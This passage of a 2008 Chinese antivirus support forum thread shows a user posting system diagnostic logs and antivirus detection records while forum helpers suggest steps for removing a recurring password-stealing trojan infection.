    [D:\qq2008\QQBaseClassInDll.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQHelperDll.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\BasicCtrlDll.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\MFC42.DLL]  [Microsoft Corporation, 6.00.8665.0]
    [D:\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
    [E:\Kingsoft Internet Security 2008\KMailOEBand.DLL]  [Kingsoft Corporation, 2008,04,22,364]
    [E:\Kingsoft Internet Security 2008\kis.dll]  [Kingsoft Corporation, 2008,04,22,364]
    [E:\Kingsoft Internet Security 2008\MFC80U.DLL]  [Microsoft Corporation, 8.00.50727.762]
    [E:\Kingsoft Internet Security 2008\MSVCR80.dll]  [Microsoft Corporation, 8.00.50727.762]
    [E:\Kingsoft Internet Security 2008\MSVCP80.dll]  [Microsoft Corporation, 8.00.50727.762]
    [D:\qq2008\RICHED32.DLL]  [Microsoft Corporation, 5.00.2134.1]
    [D:\qq2008\RICHED20.dll]  [Microsoft Corporation, 5.31.23.1218]
    [D:\qq2008\QQAPI.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\LoginCtrl.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\LoginCtrlRes.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQRes.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\CQQApplication.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQMainFrame.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\gdiplus.dll]  [Microsoft Corporation, 5.1.3102.3352 (xpsp_sp2_qfe.080415-1302)]
    [D:\qq2008\QQPlugin.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\UnReadMsgMgr.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQAllInOne.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\SCCore.dll]  [TENCENT, 1, 6, 0, 2]
    [D:\qq2008\CameraDll.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\FlashAvatarDll.dll]  [, 1, 0, 0, 1]
    [D:\qq2008\NewSkin.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\MailSummary.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQSpace.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\vbscript.dll]  [Microsoft Corporation, 5.6.0.7426]
    [E:\Kingsoft Internet Security 2008\Flash.OCX]  [Adobe Systems, Inc., 9,0,124,0]
    [C:\WINDOWS\system32\msacm32.drv]  [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
    [C:\WINDOWS\system32\msdmo.dll]  [, ]
    [D:\qq2008\OEMApplication.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQAvatar.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQKnowledgeSearch.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQGroupMng.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQPet.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQSysMsgMng.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\UserDefinedHead.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQConfigPlugin.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQCustomFace.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QRingMng.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\LongConnection.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\PhoneAPI.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\DialerAllinOne.dll]  [tencent, 1, 4, 0, 0]
    [D:\qq2008\BQQApplication.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\CommercesMng.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\PersonalDesktop.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQAddr.dll]  [深圳市腾讯计算机系统有限公司, 5, 0, 101, 330]
    [D:\qq2008\QQSceneMng.dll]  [TENCENT, 8,0,978,1833]
[PID: 7228 / Administrator][D:\Downloads\sreng2\SREngLdr.EXE]  [Smallfrogs Studio, 2.6.12.1018]
[PID: 9064 / Administrator][D:\Downloads\sreng2\SRE9b4eb966.EXE]  [Smallfrogs Studio, 2.6.12.1018]
    [D:\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
    [E:\Kingsoft Internet Security 2008\KMailOEBand.DLL]  [Kingsoft Corporation, 2008,04,22,364]
    [E:\Kingsoft Internet Security 2008\kis.dll]  [Kingsoft Corporation, 2008,04,22,364]
    [E:\Kingsoft Internet Security 2008\MFC80U.DLL]  [Microsoft Corporation, 8.00.50727.762]
    [E:\Kingsoft Internet Security 2008\MSVCR80.dll]  [Microsoft Corporation, 8.00.50727.762]
    [E:\Kingsoft Internet Security 2008\MSVCP80.dll]  [Microsoft Corporation, 8.00.50727.762]
    [D:\Downloads\sreng2\Upload\3rdUpd.DLL]  [Smallfrogs Studio, 2, 1, 0, 15]
    [C:\PROGRA~1\MICROS~2\OFFICE11\MCPS.DLL]  [Microsoft Corporation, 11.0.8164]

==================================
文件关联
.TXT  Error. [C:\WINDOWS\notepad.exe %1]
.EXE  OK. ["%1" %*]
.COM  OK. ["%1" %*]
.PIF  OK. ["%1" %*]
.REG  OK. [regedit.exe "%1"]
.BAT  OK. ["%1" %*]
.SCR  OK. ["%1" /S]
.CHM  Error. ["hh.exe" %1]
.HLP  Error. [winhlp32.exe %1]
.INI  Error. [C:\WINDOWS\System32\NOTEPAD.EXE %1]
.INF  OK. [%SystemRoot%\System32\NOTEPAD.EXE %1]
.VBS  Error. [%SystemRoot%\System32\CScript.exe "%1" %*]
.JS   Error. [%SystemRoot%\System32\CScript.exe "%1" %*]
.LNK  OK. [{00021401-0000-0000-C000-000000000046}]

==================================
Winsock 提供者
N/A

==================================
Autorun.inf
N/A

==================================
HOSTS 文件
127.0.0.1       localhost

==================================
进程特权扫描
特殊特权被允许: SeLoadDriverPrivilege [PID = 732, C:\WINDOWS\SYSTEM32\WINLOGON.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 2860, C:\WINDOWS\ALCFDRTM.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 7228, D:\DOWNLOADS\SRENG2\SRENGLDR.EXE]

==================================
API HOOK
N/A

==================================
隐藏进程
N/A

==================================

TOP

PH-Winter

爱毒霸社区缉毒队

积分
6882 
威望
14235  
元宝
207  
铜钱
8922  

天才奖 毒霸MVP勋章

4楼 发表于 2008-9-21 15:12  只看该作者
请打开清理专家--->在线系统诊断--->导出诊断报告--->打钩全选--->保存诊断报告

然后将报告上传至论坛

并且寻找是否存在如下文件
引用:
C:\hxsydg.vbs
C:\rcbzlhh.exe

TOP

KSDB6008951

新兵

积分
16 
威望
34  
元宝
0  
铜钱
24  
5楼 发表于 2008-9-21 15:29  只看该作者

谢谢 麻烦了

==============================================================
        金山清理专家系统诊断报告

该诊断报告由金山清理专家提供 http://www.duba.net
==============================================================

诊断时间:            2008-09-21, 15:29
诊断平台:            Windows XP [5.1.2600] Service Pack 2
IE版本:              Internet Explorer V6.0.2180.2900
计算机物理内存:      1023(MB)
当前可用内存:        513(MB)
硬盘总大小:          146(GB)
硬盘可用空间:        34(GB)
清理专家版本:        2008.07.16.472
恶意软件库版本:      2008.08.06.1
漏洞库版本:          2008.09.02.1




==============================================================
        启动文件夹位置
==============================================================

Common Startup:      C:\Documents and Settings\All Users\「开始」菜单\程序\启动
Startup:             C:\Documents and Settings\Administrator\「开始」菜单\程序\启动
Common Startup:      %ALLUSERSPROFILE%\「开始」菜单\程序\启动

==============================================================
        开始菜单启动项
==============================================================

<宽带连接.lnk>  <C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\宽带连接.lnk>
文件路径:  [残留信息]


==============================================================
        文件扩展名关联
==============================================================

.ASF            <"E:\暴风影院\Storm.exe" /play "%1">
文件路径: E:\暴风影院\Storm.exe [分析中]

.AVI            <"E:\暴风影院\Storm.exe" /play "%1">
文件路径: E:\暴风影院\Storm.exe [分析中]

.MPG(.MPEG)     <"E:\暴风影院\Storm.exe" /play "%1">
文件路径: E:\暴风影院\Storm.exe [分析中]


==============================================================
        Host File
==============================================================

127.0.0.1       localhost

==============================================================
        系统服务
==============================================================

该项来源: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

        [ccosm] [已启用]               <E:\暴风影院\stormliv.exe /asservice>
        文件路径: E:\暴风影院\stormliv.exe [分析中]


==============================================================
        当前进程
==============================================================

名称:     stormliv.exe  [已启用]
命令行:   E:\暴风影院\stormliv.exe /asservice
文件路径: E:\暴风影院\stormliv.exe  [分析中]                   (北京暴风网际科技有限公司)
模块文件: C:\WINDOWS\system32\ntdll.dll                 (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\kernel32.dll              (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\SHLWAPI.dll               (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\ADVAPI32.dll              (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\RPCRT4.dll                (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\Secur32.dll               (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\GDI32.dll                 (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\USER32.dll                (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\msvcrt.dll                (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\WS2_32.dll                (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\WS2HELP.dll               (Microsoft Corporation)
模块文件: E:\暴风影院\MSVCP60.dll                           (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\MFC42.DLL                 (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\comdlg32.dll              (Microsoft Corporation)
模块文件: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2982_x-ww_ac3f9c03\COMCTL32.dll (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\SHELL32.dll               (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\ole32.dll                 (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\OLEAUT32.dll              (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\USERENV.dll               (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\VERSION.dll               (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\SETUPAPI.dll              (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\WININET.dll               (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\CRYPT32.dll               (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\MSASN1.dll                (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\IMM32.DLL                 (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\LPK.DLL                   (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\USP10.dll                 (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\MFC42LOC.DLL              (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\uxtheme.dll               (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\xpsp2res.dll              (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\mswsock.dll               (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\hnetcfg.dll               (Microsoft Corporation)
模块文件: C:\WINDOWS\System32\wshtcpip.dll              (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\CLBCATQ.DLL               (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\COMRes.dll                (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\msxml3.dll                (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\DNSAPI.dll                (Microsoft Corporation)
模块文件: C:\WINDOWS\System32\winrnr.dll                (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\WLDAP32.dll               (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\rasadhlp.dll              (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\netapi32.dll              (Microsoft Corporation)
模块文件: E:\暴风影院\bfoptdll.dll                          (北京暴风网际科技有限公司)
模块文件: C:\WINDOWS\system32\mlang.dll                 (Microsoft Corporation)
模块文件: E:\暴风影院\box\BoxLog.dll                        (北京暴风网际科技有限公司)
模块文件: C:\WINDOWS\system32\quartz.dll                (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\WINMM.dll                 (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\devenum.dll               (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\cryptdll.dll              (Microsoft Corporation)


==============================================================
        其他安全区域
==============================================================

该项来源: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved

        [显示摇曳 CPL 扩展]         <deskpan.dll>

TOP

KSDB6008951

新兵

积分
16 
威望
34  
元宝
0  
铜钱
24  
6楼 发表于 2008-9-21 15:30  只看该作者
C:\rcbzlhh.exe 已经给金山杀了

TOP

KSDB6008951

新兵

积分
16 
威望
34  
元宝
0  
铜钱
24  
7楼 发表于 2008-9-21 15:31  只看该作者
两个VBS文件 给我改成TXT文件后就可以删掉

TOP

PH-Winter

爱毒霸社区缉毒队

积分
6882 
威望
14235  
元宝
207  
铜钱
8922  

天才奖 毒霸MVP勋章

8楼 发表于 2008-9-21 15:45  只看该作者
清理专家诊断报告没看出什么问题

请上传文件实时防毒的日志

金山毒霸主程序 ---> 工具 ---> 日志查看器 ---> 文件实时防毒

TOP

KSDB6008951

新兵

积分
16 
威望
34  
元宝
0  
铜钱
24  
9楼 发表于 2008-9-21 15:48  只看该作者
实时防毒(按时间降序排列)
病毒 2008-09-21 14:28:29 病毒在文件C:\rcbzlhh.exe中 Win32.Troj.XSeyT.vb.401408 处理成功(操作:删除)
信息 2008-09-21 14:03:33 KWatch3.SYS开始运行   
信息 2008-09-21 14:03:33 KAEngine初始化成功   
信息 2008-09-21 14:02:05 KWatch3.SYS初始化成功   
信息 2008-09-21 14:02:05 KWatch3.SYS开始加载   
信息 2008-09-21 14:02:05 KAVIPC开始运行   
信息 2008-09-21 14:02:05 KAVIPC初始化成功   
信息 2008-09-21 14:02:05 KAVIPC开始加载   
信息 2008-09-21 14:02:05 Windows Security Center初始化成功   
信息 2008-09-21 14:02:05 Restore-Module初始化成功   
信息 2008-09-21 14:02:05 Windows Logon Splash初始化成功   
信息 2008-09-21 14:02:05 金山毒霸文件实时防毒开始加载

TOP

PH-Winter

爱毒霸社区缉毒队

积分
6882 
威望
14235  
元宝
207  
铜钱
8922  

天才奖 毒霸MVP勋章

10楼 发表于 2008-9-21 16:13  只看该作者
类似这条的提示共出现过几次?

TOP

KSDB6008951

新兵

积分
16 
威望
34  
元宝
0  
铜钱
24  
11楼 发表于 2008-9-21 16:18  只看该作者
昨天重装后 第一次 , 但是这个VBS和病毒已经3个星期了 删了又生,一开始是中FTPPOPO木马

TOP

polly

新兵

积分
30 
威望
55  
元宝
0  
铜钱
20  
12楼 发表于 2008-9-21 16:33  只看该作者
送到virus.org分析一下吧~

TOP

KSDB6008951

新兵

积分
16 
威望
34  
元宝
0  
铜钱
24  
13楼 发表于 2008-9-21 16:35  只看该作者
virus.org 是什么呢 我菜 对不起 不懂 麻烦

TOP

KSDB6008951

新兵

积分
16 
威望
34  
元宝
0  
铜钱
24  
14楼 发表于 2008-9-21 21:56  只看该作者

补充

刚才又有病毒杀出来
病毒        2008-09-21 21:51:52        病毒在文件C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\GHI1K3M5\gx[1].jpg中        Win32.PSWTroj.OnLineGames.237568        处理成功(操作:删除)       
病毒        2008-09-21 21:50:31        病毒在文件C:\WINDOWS\system32\cc.exe中        Win32.PSWTroj.OnLineGames.237568        处理成功(操作:删除)

TOP

无事无非

其实我是一个演员


上将(管理员)

要爱国!

积分
10234 
威望
18245  
元宝
1  
铜钱
6779  

安全精英 毒霸MVP勋章 一级密保勋章 紫冠勋章 技术达人 病毒解剖师 安全新秀 AA 清理专家 电脑清理高手 AA

15楼 发表于 2008-9-22 18:11  只看该作者
楼主是什么上网方式呢
默默祈祷,愿世界无灾无难,望天下无事无非~
     
╭⌒╮下雨了~ ¤  ╭⌒╮ ╭⌒╮
╭⌒╭⌒╮╭⌒╮~╭⌒╮︶︶, ︶︶   
,︶︶︶︶,\'\'︶~~ ,\'\'~︶︶  ,\'\'   
╱◥█◣ ╱◥█◣
︱田︱田︱︱田︱田︱
╬╬╬╬╬╬╬╬╬╬╬╬?wbr>p╬  

TOP

AGASAHIROSHI

新兵

积分
49 
威望
94  
元宝
0  
铜钱
51  
16楼 发表于 2008-9-26 21:59  只看该作者
看来是楼主上网时中招了。
建议 system32 下好好查查。
注重能力!关注精品!

TOP

wmd123

上尉

积分
3675 
威望
6118  
元宝
0  
铜钱
498  
17楼 发表于 2008-10-4 16:48  只看该作者
sreng的log正常,你是不是经常上固定的网站,比如把主页设置成固定的等等,先清空ie临时文件夹和系统临时文件夹,试着别上那些网站看看还会会出问题。
用sreng修复一下文件关联
.TXT
.CHM
.HLP
.INI  
.VBS
.JS   

以下操作存在风险请慎用:
再在system32文件夹下以建立时间查看所有文件,将中毒当天的文件的后缀名改掉,例如:.exe改成.ex这样如果改后有问题,dos下也可以很快改回来,
hijackthis扫log[url]http://bbs.kingsoft.com/viewthread.php?tid=326358&fpage=1[/url] 操作[url]http://www.xici.net/main.asp?doc=41593440[/url] 趋势在线杀毒:(xp带网络连接的安全模式进入) [url]http://www.hcny.gov.cn/netres/netres.htm[/url] 趋势小工具[url]ftp://ftp.trendmicro.com.cn/support/public[/url] 一般问题的解决[url]http://www.hongsanhuan.com.cn/bbsnew/showtopic.asp?TOPIC_ID=159&Forum_ID=7[/url]

TOP

xiaopeng018

四级士官

积分
1279 
威望
2760  
元宝
0  
铜钱
1807  
18楼 发表于 2008-10-4 16:53  只看该作者
ftppopo木马。。。。
参考我写的那个解决办法吧
sreng日志无法彻底解决问题

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题